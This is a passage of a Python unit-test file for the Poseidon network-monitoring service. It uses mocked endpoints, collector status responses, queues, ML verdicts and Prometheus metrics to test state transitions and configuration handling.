                    prod_host + ('MIRRORING', 'KNOWN'),
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a7':
                    prod_host + ('KNOWN', 'REINVESTIGATING'),
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a8':
                    prod_host + ('UNKNOWN', 'SHUTDOWN'),
                'd60c5fa5c980b1cd791208eaf62aba9fb46d3aaa':
                    core_host + ('MIRRORING', 'NONE'),
                'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa1':
                    core_host + ('MIRRORING', 'NONE'),
                'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa2':
                    core_host + ('REINVESTIGATING', 'NONE'),
                'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa3':
                    core_host + ('REINVESTIGATING', 'NONE'),
            }
            self.endpoints = Endpoint_Wrapper()
            for dev_hash, args in transitions.items():
                self.endpoints.state[dev_hash] = _endpoint(*args)
            self.logger = None

    class MockMonitor(Monitor):
        def __init__(self):
            # Bypass Monitor.__init__; provide only what the method reads.
            self.mod_configuration = {
                'reinvestigation_frequency': 900,
                'collector_nic': 2,
                'vent_ip': '0.0.0.0',
                'vent_port': '8080',
            }
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger
            self.uss = Mock_Update_Switch_State()

    mock_monitor = MockMonitor()
    mock_monitor.logger = MockLogger().logger
    result = mock_monitor.get_vent_collectors()
    assert isinstance(result, dict)
def test_host_has_active_collectors_false():
    """host_has_active_collectors() must report False when every collector
    for the queried hash has exited."""
    class MockLogger:
        def __init__(self):
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger

    class MockRequests():
        # Stand-in for the real `requests` module; monkey-patched onto
        # poseidonMonitor below so no network traffic happens.
        def __init__(self):
            pass

        def get(self, uri):
            def mock_response():
                def mock_json():
                    # Parsed form of the payload the vent endpoint would
                    # serve (identical to json.loads of the original text).
                    return {'dataset': [
                        {'ip': '10.176.143.99', 'mac': '20:4c:9e:5f:e3:c4',
                         'segment': 'to-core-router', 'port': None,
                         'tenant': 'EXTERNAL', 'record_source': 'Poseidon',
                         'role': 'Unknown', 'os': 'Unknown', 'behavior': 0,
                         'hash': '6b961fd660269dd1384605bd439ffb197fd53f0f',
                         'state': 'KNOWN', 'active': 1},
                        {'ip': '10.177.0.253', 'mac': '52:54:00:66:df:67',
                         'segment': 'prod', 'port': None,
                         'tenant': 'ESX', 'record_source': 'Poseidon',
                         'role': 'Unknown', 'os': 'Unknown', 'behavior': 0,
                         'hash': 'b8d31352453a65036b4343f34c2a93f5d5442b70',
                         'state': 'KNOWN', 'active': 0},
                        {'ip': '10.176.143.1', 'mac': '18:66:da:7f:35:60',
                         'segment': 'to-core-router', 'port': None,
                         'tenant': 'EXTERNAL', 'record_source': 'Poseidon',
                         'role': 'Unknown', 'os': 'Unknown', 'behavior': 1,
                         'hash': 'bc3e82c8672ab19e5c3959d8135b873297209ff4',
                         'state': 'KNOWN', 'active': 1}]}
                mock_response.json = mock_json
                return None
            # All three collectors report 'exited' -> no active collectors.
            mock_response.text = (
                "(True, [{'status': u'exited', 'args': [u'enp3s0', u'900', "
                "u'test0', u'1', "
                "u'host 192.168.0.30'], 'id': u'0bce1351109e'}, "
                "{'status': u'exited', 'args': [u'enp3s0', u'900', "
                "u'test1', u'1', "
                "u'host 192.168.0.20'], 'id': u'c1a662efea1c'}, "
                "{'status': u'exited', 'args': [u'enp3s0', u'900', "
                "u'test2', u'1', "
                "u'host 192.168.0.50'], 'id': u'2602280bb9da'}])")
            # cover the mock object itself
            a = mock_response()
            b = mock_response.json()
            assert a is None
            assert isinstance(b, dict)
            return mock_response

    poseidonMonitor.CTRL_C['STOP'] = False
    poseidonMonitor.requests = MockRequests()

    def _endpoint(ip, mac, segment, tenant, state, next_state):
        # One EndPoint record; every entry shares prev_state='NONE'.
        return EndPoint(
            {'ip-address': ip, 'mac': mac, 'segment': segment,
             'tenant': tenant, 'name': None},
            prev_state='NONE', state=state, next_state=next_state)

    class Mock_Update_Switch_State():
        def __init__(self):
            prod_host = ('10.0.0.101', 'f8:b1:56:fe:f2:de', 'prod', 'FOO')
            core_host = ('10.0.0.99', '20:4c:9e:5f:e3:c3',
                         'to-core-router', 'EXTERNAL')
            transitions = {
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a3':
                    prod_host + ('UNKNOWN', 'NONE'),
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a4':
                    prod_host + ('UNKNOWN', 'MIRRORING'),
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a5':
                    prod_host + ('UNKNOWN', 'KNOWN'),
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a6':
                    prod_host + ('MIRRORING', 'KNOWN'),
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a7':
                    prod_host + ('KNOWN', 'REINVESTIGATING'),
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a8':
                    prod_host + ('UNKNOWN', 'SHUTDOWN'),
                'd60c5fa5c980b1cd791208eaf62aba9fb46d3aaa':
                    core_host + ('MIRRORING', 'NONE'),
                'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa1':
                    core_host + ('MIRRORING', 'NONE'),
                'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa2':
                    core_host + ('REINVESTIGATING', 'NONE'),
                'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa3':
                    core_host + ('REINVESTIGATING', 'NONE'),
            }
            self.endpoints = Endpoint_Wrapper()
            for dev_hash, args in transitions.items():
                self.endpoints.state[dev_hash] = _endpoint(*args)
            self.logger = None

    class MockMonitor(Monitor):
        def __init__(self):
            # Bypass Monitor.__init__; provide only what the method reads.
            self.mod_configuration = {
                'reinvestigation_frequency': 900,
                'collector_nic': 2,
                'vent_ip': '0.0.0.0',
                'vent_port': '8080',
            }
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger
            self.uss = Mock_Update_Switch_State()

    mock_monitor = MockMonitor()
    mock_monitor.logger = MockLogger().logger
    dev_hash = 'test0'
    result = mock_monitor.host_has_active_collectors(dev_hash)
    assert result == False
def test_host_has_active_collectors_true():
    """host_has_active_collectors() must report True when at least one
    collector on the same host as the queried hash is still running."""
    class MockLogger:
        def __init__(self):
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger

    class MockRequests():
        # Stand-in for the real `requests` module; monkey-patched onto
        # poseidonMonitor below so no network traffic happens.
        def __init__(self):
            pass

        def get(self, uri):
            def mock_response():
                def mock_json():
                    # Parsed form of the payload the vent endpoint would
                    # serve (identical to json.loads of the original text).
                    return {'dataset': [
                        {'ip': '10.176.143.99', 'mac': '20:4c:9e:5f:e3:c4',
                         'segment': 'to-core-router', 'port': None,
                         'tenant': 'EXTERNAL', 'record_source': 'Poseidon',
                         'role': 'Unknown', 'os': 'Unknown', 'behavior': 0,
                         'hash': '6b961fd660269dd1384605bd439ffb197fd53f0f',
                         'state': 'KNOWN', 'active': 1},
                        {'ip': '10.177.0.253', 'mac': '52:54:00:66:df:67',
                         'segment': 'prod', 'port': None,
                         'tenant': 'ESX', 'record_source': 'Poseidon',
                         'role': 'Unknown', 'os': 'Unknown', 'behavior': 0,
                         'hash': 'b8d31352453a65036b4343f34c2a93f5d5442b70',
                         'state': 'KNOWN', 'active': 0},
                        {'ip': '10.176.143.1', 'mac': '18:66:da:7f:35:60',
                         'segment': 'to-core-router', 'port': None,
                         'tenant': 'EXTERNAL', 'record_source': 'Poseidon',
                         'role': 'Unknown', 'os': 'Unknown', 'behavior': 1,
                         'hash': 'bc3e82c8672ab19e5c3959d8135b873297209ff4',
                         'state': 'KNOWN', 'active': 1}]}
                mock_response.json = mock_json
                return None
            # 'test2' is still 'running' on the same host (192.168.0.30),
            # which should make the check come back True.
            mock_response.text = (
                "(True, [{'status': u'exited', 'args': [u'enp3s0', u'900', "
                "u'test0', u'1', "
                "u'host 192.168.0.30'], 'id': u'0bce1351109e'}, "
                "{'status': u'exited', 'args': [u'enp3s0', u'900', "
                "u'test1', u'1', "
                "u'host 192.168.0.30'], 'id': u'c1a662efea1c'}, "
                "{'status': u'running', 'args': [u'enp3s0', u'900', "
                "u'test2', u'1', "
                "u'host 192.168.0.30'], 'id': u'2602280bb9da'}])")
            # cover the mock object itself
            a = mock_response()
            b = mock_response.json()
            assert a is None
            assert isinstance(b, dict)
            return mock_response

    poseidonMonitor.CTRL_C['STOP'] = False
    poseidonMonitor.requests = MockRequests()

    def _endpoint(ip, mac, segment, tenant, state, next_state):
        # One EndPoint record; every entry shares prev_state='NONE'.
        return EndPoint(
            {'ip-address': ip, 'mac': mac, 'segment': segment,
             'tenant': tenant, 'name': None},
            prev_state='NONE', state=state, next_state=next_state)

    class Mock_Update_Switch_State():
        def __init__(self):
            prod_host = ('10.0.0.101', 'f8:b1:56:fe:f2:de', 'prod', 'FOO')
            core_host = ('10.0.0.99', '20:4c:9e:5f:e3:c3',
                         'to-core-router', 'EXTERNAL')
            transitions = {
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a3':
                    prod_host + ('UNKNOWN', 'NONE'),
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a4':
                    prod_host + ('UNKNOWN', 'MIRRORING'),
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a5':
                    prod_host + ('UNKNOWN', 'KNOWN'),
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a6':
                    prod_host + ('MIRRORING', 'KNOWN'),
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a7':
                    prod_host + ('KNOWN', 'REINVESTIGATING'),
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a8':
                    prod_host + ('UNKNOWN', 'SHUTDOWN'),
                'd60c5fa5c980b1cd791208eaf62aba9fb46d3aaa':
                    core_host + ('MIRRORING', 'NONE'),
                'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa1':
                    core_host + ('MIRRORING', 'NONE'),
                'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa2':
                    core_host + ('REINVESTIGATING', 'NONE'),
                'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa3':
                    core_host + ('REINVESTIGATING', 'NONE'),
            }
            self.endpoints = Endpoint_Wrapper()
            for dev_hash, args in transitions.items():
                self.endpoints.state[dev_hash] = _endpoint(*args)
            self.logger = None

    class MockMonitor(Monitor):
        def __init__(self):
            # Bypass Monitor.__init__; provide only what the method reads.
            self.mod_configuration = {
                'reinvestigation_frequency': 900,
                'collector_nic': 2,
                'vent_ip': '0.0.0.0',
                'vent_port': '8080',
            }
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger
            self.uss = Mock_Update_Switch_State()

    mock_monitor = MockMonitor()
    mock_monitor.logger = MockLogger().logger
    dev_hash = 'test0'
    result = mock_monitor.host_has_active_collectors(dev_hash)
    assert result == True
def test_get_q_item():
    """get_q_item() yields (True, item) while running and (False, None)
    once CTRL_C['STOP'] has been raised."""
    class StubQueue:
        def get(self, block):
            return 'Item'

    class MockMonitor(Monitor):
        def __init__(self):
            # Bypass Monitor.__init__; only the loggers are needed.
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger

    poseidonMonitor.CTRL_C['STOP'] = False
    monitor = MockMonitor()
    monitor.m_queue = StubQueue()
    assert monitor.get_q_item() == (True, 'Item')
    # With the stop flag set, nothing should be dequeued.
    poseidonMonitor.CTRL_C['STOP'] = True
    monitor.m_queue = StubQueue()
    assert monitor.get_q_item() == (False, None)
def test_format_rabbit_message():
    """format_rabbit_message() decodes the payload for the decider routing
    key and falls back to an empty dict for any other key."""
    poseidonMonitor.CTRL_C['STOP'] = False

    class MockLogger:
        def __init__(self):
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger

    class MockMonitor(Monitor):
        def __init__(self):
            # Bypass Monitor.__init__; provide only what the method reads.
            self.fa_rabbit_routing_key = 'foo'
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger

    monitor = MockMonitor()
    monitor.logger = MockLogger().logger
    payload = {'Key1': 'Val1'}
    # Recognized routing key: the decoded payload comes back unchanged.
    message = ('poseidon.algos.decider', json.dumps(payload))
    assert monitor.format_rabbit_message(message) == payload
    # Unrecognized routing key: an empty dict comes back.
    message = (None, json.dumps(payload))
    assert monitor.format_rabbit_message(message) == {}
def test_rabbit_callback():
    """rabbit_callback() must enqueue (routing_key, body) when a queue is
    supplied and tolerate a missing queue."""
    def mock_method(): return True
    mock_method.routing_key = 'test_routing_key'
    # Force coverage of the stub itself.
    assert mock_method()

    class CapturingQueue:
        item = None

        def put(self, item):
            self.item = item
            return True

        def get_item(self):
            # Test helper: expose what was enqueued.
            return self.item

    queue = CapturingQueue()
    poseidonMonitor.rabbit_callback(
        'Channel', mock_method, 'properties', 'body', queue)
    assert queue.get_item() == (mock_method.routing_key, 'body')
    # No queue: the callback must simply not blow up.
    poseidonMonitor.rabbit_callback(
        'Channel', mock_method, 'properties', 'body', None)
def test_schedule_job_reinvestigation():
    """Exercise schedule_job_reinvestigation() against a populated table,
    a larger table with an unrecognized state, an empty table, and a
    single-entry table."""
    class MockLogger:
        def __init__(self):
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger

    def _endpoint(ip, mac, segment, tenant, state, next_state):
        # One EndPoint record; every entry shares prev_state='NONE'.
        return EndPoint(
            {'ip-address': ip, 'mac': mac, 'segment': segment,
             'tenant': tenant, 'name': None},
            prev_state='NONE', state=state, next_state=next_state)

    prod_host = ('10.0.0.101', 'f8:b1:56:fe:f2:de', 'prod', 'FOO')
    core_host = ('10.0.0.99', '20:4c:9e:5f:e3:c3',
                 'to-core-router', 'EXTERNAL')

    # First table: nine endpoints across the usual state transitions.
    transitions = {
        '4ee39d254db3e4a5264b75ce8ae312d69f9e73a3':
            prod_host + ('REINVESTIGATING', 'UNKNOWN'),
        '4ee39d254db3e4a5264b75ce8ae312d69f9e73a4':
            prod_host + ('UNKNOWN', 'MIRRORING'),
        '4ee39d254db3e4a5264b75ce8ae312d69f9e73a5':
            prod_host + ('UNKNOWN', 'KNOWN'),
        '4ee39d254db3e4a5264b75ce8ae312d69f9e73a6':
            prod_host + ('MIRRORING', 'KNOWN'),
        '4ee39d254db3e4a5264b75ce8ae312d69f9e73a7':
            prod_host + ('KNOWN', 'REINVESTIGATING'),
        '4ee39d254db3e4a5264b75ce8ae312d69f9e73a8':
            prod_host + ('UNKNOWN', 'SHUTDOWN'),
        'd60c5fa5c980b1cd791208eaf62aba9fb46d3aaa':
            core_host + ('UNKNOWN', 'REINVESTIGATING'),
        'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa1':
            core_host + ('KNOWN', 'UNKNOWN'),
        'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa2':
            core_host + ('UNKNOWN', 'REINVESTIGATING'),
    }
    epw = Endpoint_Wrapper()
    for dev_hash, args in transitions.items():
        epw.state[dev_hash] = _endpoint(*args)
    assert len(epw.state) == 9
    poseidonMonitor.schedule_job_reinvestigation(9, epw, MockLogger().logger)

    # Second table: the same nine plus three more, one of which sits in a
    # state the scheduler does not recognize ('OTHER-STATE').
    transitions.update({
        'c60c5fa5c980b1cd791208eaf62aba9fb46d3aaa':
            core_host + ('UNKNOWN', 'REINVESTIGATING'),
        'c60c5fa5c980b1cd791208eaf62aba9fb46d3aa1':
            core_host + ('UNKNOWN', 'REINVESTIGATING'),
        'c60c5fa5c980b1cd791208eaf62aba9fb46d3aa2':
            core_host + ('OTHER-STATE', 'UNKNOWN'),
    })
    epw = Endpoint_Wrapper()
    for dev_hash, args in transitions.items():
        epw.state[dev_hash] = _endpoint(*args)
    poseidonMonitor.schedule_job_reinvestigation(4, epw, MockLogger().logger)

    # Empty table.
    epw = Endpoint_Wrapper()
    poseidonMonitor.schedule_job_reinvestigation(4, epw, MockLogger().logger)

    # Single-entry table.
    key = '4ee39d254db3e4a5264b75ce8ae312d69f9e73a3'
    epw.state[key] = _endpoint(*transitions[key])
    poseidonMonitor.schedule_job_reinvestigation(4, epw, MockLogger().logger)
def test_update_next_state():
    """update_next_state() should map ML verdicts (validity + behavior)
    onto each endpoint's next_state and tolerate unknown hashes and
    invalid classifications."""
    class MockLogger():
        def __init__(self):
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger

    def _endpoint(ip, mac, segment, tenant, state, next_state):
        # One EndPoint record; every entry shares prev_state='NONE'.
        return EndPoint(
            {'ip-address': ip, 'mac': mac, 'segment': segment,
             'tenant': tenant, 'name': None},
            prev_state='NONE', state=state, next_state=next_state)

    class Mock_Update_Switch_State():
        def __init__(self):
            prod_host = ('10.0.0.101', 'f8:b1:56:fe:f2:de', 'prod', 'FOO')
            core_host = ('10.0.0.99', '20:4c:9e:5f:e3:c3',
                         'to-core-router', 'EXTERNAL')
            transitions = {
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a3':
                    prod_host + ('UNKNOWN', 'NONE'),
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a4':
                    prod_host + ('UNKNOWN', 'MIRRORING'),
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a5':
                    prod_host + ('UNKNOWN', 'KNOWN'),
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a6':
                    prod_host + ('MIRRORING', 'KNOWN'),
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a7':
                    prod_host + ('KNOWN', 'REINVESTIGATING'),
                '4ee39d254db3e4a5264b75ce8ae312d69f9e73a8':
                    prod_host + ('UNKNOWN', 'SHUTDOWN'),
                'd60c5fa5c980b1cd791208eaf62aba9fb46d3aaa':
                    core_host + ('MIRRORING', 'NONE'),
                'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa1':
                    core_host + ('MIRRORING', 'NONE'),
                'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa2':
                    core_host + ('REINVESTIGATING', 'NONE'),
                'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa3':
                    core_host + ('REINVESTIGATING', 'NONE'),
            }
            self.endpoints = Endpoint_Wrapper()
            for dev_hash, args in transitions.items():
                self.endpoints.state[dev_hash] = _endpoint(*args)
            self.logger = None

        def return_endpoint_state(self):
            return self.endpoints

    class MockMonitor(Monitor):
        def __init__(self):
            # Bypass Monitor.__init__; provide only what the method reads.
            self.uss = None
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger

    monitor = MockMonitor()
    monitor.uss = Mock_Update_Switch_State()
    monitor.logger = MockLogger().logger

    def _ml_result(behavior, valid=True):
        # Shape of one classifier verdict; only behavior/valid vary here.
        return {
            'valid': valid,
            'classification': {
                'labels': ['Unknown', 'Smartphone', 'Developer workstation'],
                'confidences': [0.9983864533039954,
                                0.0010041873867962805,
                                0.00042691313815914093]},
            'timestamp': 1508366767.45571,
            'decisions': {'investigate': True, 'behavior': behavior}}

    ml_return = {
        'd60c5fa5c980b1cd791208eaf62aba9fb46d3aaa': _ml_result('normal'),
        'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa1': _ml_result('abnormal'),
        'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa2': _ml_result('normal'),
        'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa3': _ml_result('abnormal'),
    }
    monitor.update_next_state(ml_return)

    # Expected next_state per endpoint after the update.
    expected_next_state = {
        '4ee39d254db3e4a5264b75ce8ae312d69f9e73a3': 'MIRRORING',
        '4ee39d254db3e4a5264b75ce8ae312d69f9e73a4': 'MIRRORING',
        '4ee39d254db3e4a5264b75ce8ae312d69f9e73a5': 'KNOWN',
        '4ee39d254db3e4a5264b75ce8ae312d69f9e73a6': 'KNOWN',
        '4ee39d254db3e4a5264b75ce8ae312d69f9e73a7': 'REINVESTIGATING',
        '4ee39d254db3e4a5264b75ce8ae312d69f9e73a8': 'MIRRORING',
        'd60c5fa5c980b1cd791208eaf62aba9fb46d3aaa': 'KNOWN',
        'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa1': 'SHUTDOWN',
        'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa2': 'KNOWN',
        'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa3': 'UNKNOWN',
    }
    eps = monitor.uss.return_endpoint_state().state
    for dev_hash, next_state in expected_next_state.items():
        assert eps[dev_hash].next_state == next_state

    # A hash absent from the endpoint table must be tolerated.
    monitor.update_next_state({'NOT_FOUND': _ml_result('normal')})
    # An invalid classification must be tolerated as well.
    monitor.update_next_state({
        'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa3':
            _ml_result('normal', valid=False)})
def test_configSelf():
    """configSelf() copies every (key, value) pair supplied by the section
    config into mod_configuration."""
    class MockMonitor(Monitor):
        def __init__(self):
            # Bypass Monitor.__init__; provide only what the method reads.
            self.mod_name = None
            self.mod_configuration = dict()
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger

    class MockConfig():
        def __init__(self):
            pass

        def get_endpoint(self, sectionType):
            # configSelf asks the config handle for a section endpoint;
            # hand back another instance that answers direct_get().
            return MockConfig()

        def direct_get(self, name):
            pairs = {1: 'one', 2: 'two', 3: 'three'}
            return list(pairs.items())

    class MockLogger():
        def __init__(self):
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger

    monitor = MockMonitor()
    monitor.logger = MockLogger().logger
    monitor.Config = MockConfig()
    monitor.configSelf()
    expected = {1: 'one', 2: 'two', 3: 'three'}
    assert str(expected) == str(dict(monitor.mod_configuration))
def test_configSelf2():
    """configSelf() must request the 'Handle_SectionConfig' endpoint, query
    it with the module's own name, and store the resulting pairs."""
    class MockMonitor(Monitor):
        def __init__(self):
            # Bypass Monitor.__init__; provide only what the method reads.
            self.mod_name = 'testingConfigSelf'
            self.mod_configuration = [1, 2, 3, 4]
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger

    class MockSectionConfig():
        def __init__(self):
            pass

        def direct_get(self, mod_name):
            # configSelf must pass its own module name through unchanged.
            assert mod_name == 'testingConfigSelf'
            return [(1, 'YOYO')]

    class MockLogger:
        def __init__(self):
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger

    class MockConfig():
        def __init__(self):
            pass

        def get_endpoint(self, endpoint_type):
            # configSelf must ask for the section-config endpoint.
            assert endpoint_type == 'Handle_SectionConfig'
            return MockSectionConfig()

    mock_monitor = MockMonitor()
    mock_monitor.Config = MockConfig()
    mock_monitor.logger = MockLogger().logger
    mock_monitor.configSelf()
    assert mock_monitor.mod_configuration[1] == 'YOYO'
def test_schedule_job_kickurl():
    """schedule_job_kickurl() should poll the controller abstraction and
    refresh the Prometheus endpoint metrics without raising."""
    class MockLogger():
        def __init__(self):
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger

        def error(self, msg):
            pass

    class helper():
        def __init__(self):
            pass

        def update_endpoint_state(self, messages=None):
            pass

    class MockNorthBoundControllerAbstraction():
        def __init__(self):
            pass

        def get_endpoint(self, some_word):
            return helper()

    class func():
        def __init__(self):
            self.faucet_event = []
            # (metric key, prometheus metric name, description, labels)
            specs = [
                ('inactive', 'poseidon_endpoint_inactive',
                 'Number of endpoints that are inactive', []),
                ('active', 'poseidon_endpoint_active',
                 'Number of endpoints that are active', []),
                ('behavior', 'poseidon_endpoint_behavior',
                 'Behavior of an endpoint, 0 is normal, 1 is abnormal',
                 ['ip', 'mac', 'tenant', 'segment', 'port', 'role', 'os',
                  'record_source']),
                ('ip_table', 'poseidon_endpoint_ip_table', 'IP Table',
                 ['mac', 'tenant', 'segment', 'port', 'role', 'os',
                  'hash_id', 'record_source']),
                ('roles', 'poseidon_endpoint_roles',
                 'Number of endpoints by role', ['record_source', 'role']),
                ('oses', 'poseidon_endpoint_oses',
                 'Number of endpoints by OS', ['record_source', 'os']),
                ('current_states', 'poseidon_endpoint_current_states',
                 'Number of endpoints by current state',
                 ['record_source', 'current_state']),
                ('vlans', 'poseidon_endpoint_vlans',
                 'Number of endpoints by VLAN', ['record_source', 'tenant']),
                ('record_sources', 'poseidon_endpoint_record_sources',
                 'Number of endpoints by record source', ['record_source']),
                ('port_tenants', 'poseidon_endpoint_port_tenants',
                 'Number of tenants by port', ['port', 'tenant']),
                ('port_hosts', 'poseidon_endpoint_port_hosts',
                 'Number of hosts by port', ['port']),
            ]
            self.prom_metrics = {}
            for key, name, description, labels in specs:
                if labels:
                    self.prom_metrics[key] = Gauge(name, description, labels)
                else:
                    self.prom_metrics[key] = Gauge(name, description)
            self.NorthBoundControllerAbstraction = \
                MockNorthBoundControllerAbstraction()

    schedule_job_kickurl(func(), MockLogger().logger)
def test_Monitor_init():
    """Monitor must construct cleanly when rabbit wiring is skipped."""
    Monitor(skip_rabbit=True)
def test_process():
    """Run Monitor.process() against a fully mocked endpoint store and check
    that every endpoint ends up in the expected (state, next_state) pair;
    then re-run with a failing queue getter to exercise the error path."""
    from threading import Thread
    import time

    def thread1():
        # Let process() spin for ~5 seconds, then signal it to stop.
        global CTRL_C
        CTRL_C['STOP'] = False
        time.sleep(5)
        CTRL_C['STOP'] = True

    class MockLogger():
        def __init__(self):
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger

    class MockEndpoint(Endpoint_Wrapper):
        def __init__(self):
            super(MockEndpoint, self).__init__()

        def configSelf(self):
            self.mod_configuration = {
                'vent_ip': '0.0.0.0',
                'vent_port': '8080'
            }

        def print_endpoint_state(self):
            return ''

        def makedata(self):
            # Seed the wrapper with ten endpoints covering the interesting
            # state/next_state transitions (mirror, known, shutdown, none).
            stuff = dict(
                {
                    '4ee39d254db3e4a5264b75ce8ae312d69f9e73a3': EndPoint({
                        'ip-address': '10.0.0.101',
                        'mac': 'f8:b1:56:fe:f2:de',
                        'segment': 'prod',
                        'tenant': 'FOO',
                        'active': 1,
                        'name': None},
                        prev_state='NONE', state='UNKNOWN', next_state='MIRRORING'),
                    '4ee39d254db3e4a5264b75ce8ae312d69f9e73a4': EndPoint({
                        'ip-address': '10.0.0.101',
                        'mac': 'f8:b1:56:fe:f2:de',
                        'segment': 'prod',
                        'tenant': 'FOO',
                        'active': 1,
                        'name': None},
                        prev_state='NONE', state='UNKNOWN', next_state='MIRRORING'),
                    '4ee39d254db3e4a5264b75ce8ae312d69f9e73a5': EndPoint({
                        'ip-address': '10.0.0.101',
                        'mac': 'f8:b1:56:fe:f2:de',
                        'segment': 'prod',
                        'tenant': 'FOO',
                        'active': 0,
                        'name': None},
                        prev_state='NONE', state='UNKNOWN', next_state='NONE'),
                    '4ee39d254db3e4a5264b75ce8ae312d69f9e73a6': EndPoint({
                        'ip-address': '10.0.0.101',
                        'mac': 'f8:b1:56:fe:f2:de',
                        'segment': 'prod',
                        'tenant': 'FOO',
                        'active': 1,
                        'name': None},
                        prev_state='NONE', state='MIRRORING', next_state='KNOWN'),
                    '4ee39d254db3e4a5264b75ce8ae312d69f9e73a7': EndPoint({
                        'ip-address': '10.0.0.101',
                        'mac': 'f8:b1:56:fe:f2:de',
                        'segment': 'prod',
                        'tenant': 'FOO',
                        'active': 1,
                        'name': None},
                        prev_state='NONE', state='KNOWN', next_state='REINVESTIGATING'),
                    '4ee39d254db3e4a5264b75ce8ae312d69f9e73a8': EndPoint({
                        'ip-address': '10.0.0.101',
                        'mac': 'f8:b1:56:fe:f2:de',
                        'segment': 'prod',
                        'tenant': 'FOO',
                        'active': 1,
                        'name': None},
                        prev_state='NONE', state='UNKNOWN', next_state='SHUTDOWN'),
                    'd60c5fa5c980b1cd791208eaf62aba9fb46d3aaa': EndPoint({
                        'ip-address': '10.0.0.99',
                        'mac': '20:4c:9e:5f:e3:c3',
                        'segment': 'to-core-router',
                        'tenant': 'EXTERNAL',
                        'active': 1,
                        'name': None},
                        prev_state='NONE', state='KNOWN', next_state='REINVESTIGATING'),
                    'd60c5fa5c980b1cd791208eaf62aba9fb46d3aab': EndPoint({
                        'ip-address': '10.0.0.99',
                        'mac': '20:4c:9e:5f:e3:c3',
                        'segment': 'to-core-router',
                        'tenant': 'EXTERNAL',
                        'active': 1,
                        'name': None},
                        prev_state='NONE', state='KNOWN', next_state='NONE'),
                    'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa1': EndPoint({
                        'ip-address': '10.0.0.99',
                        'mac': '20:4c:9e:5f:e3:c3',
                        'segment': 'to-core-router',
                        'tenant': 'EXTERNAL',
                        'active': 1,
                        'name': None},
                        prev_state='NONE', state='REINVESTIGATING', next_state='KNOWN'),
                    'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa2': EndPoint({
                        'ip-address': '10.0.0.99',
                        'mac': '20:4c:9e:5f:e3:c3',
                        'segment': 'to-core-router',
                        'tenant': 'EXTERNAL',
                        'active': 1,
                        'name': None},
                        prev_state='NONE', state='UNKNOWN', next_state='NONE')
                })
            for s in stuff:
                self.state[s] = stuff[s]

    class MockUss():
        # Stub of the underlying switch service: all mutating calls no-op.
        def __init__(self):
            self.endpoints = MockEndpoint()
            self.endpoints.makedata()

        def mirror_endpoint(self, endpoint_hash, messages=None):
            return None

        def unmirror_endpoint(self, endpoint_hash, messages=None):
            return None

        def shutdown_endpoint(self, endpoint_hash, messages=None):
            return None

        def change_endpoint_state(self, endpoint_hash):
            return None

        def return_endpoint_state(self):
            return self.endpoints

    class MockMonitor(Monitor):
        def __init__(self):
            self.mod_configuration = {
                'reinvestigation_frequency': 900,
                'collector_nic': 2,
                'vent_ip': '0.0.0.0',
                'vent_port': '8080'
            }
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger
            self.fa_rabbit_routing_key = 'FAUCET.Event'
            self.faucet_event = None

        def get_q_item(self):
            # Happy path: queue yields a valid (found, item) pair.
            return (True, ('foo', {}))

        def bad_get_q_item(self):
            # Failure path: queue reports nothing found.
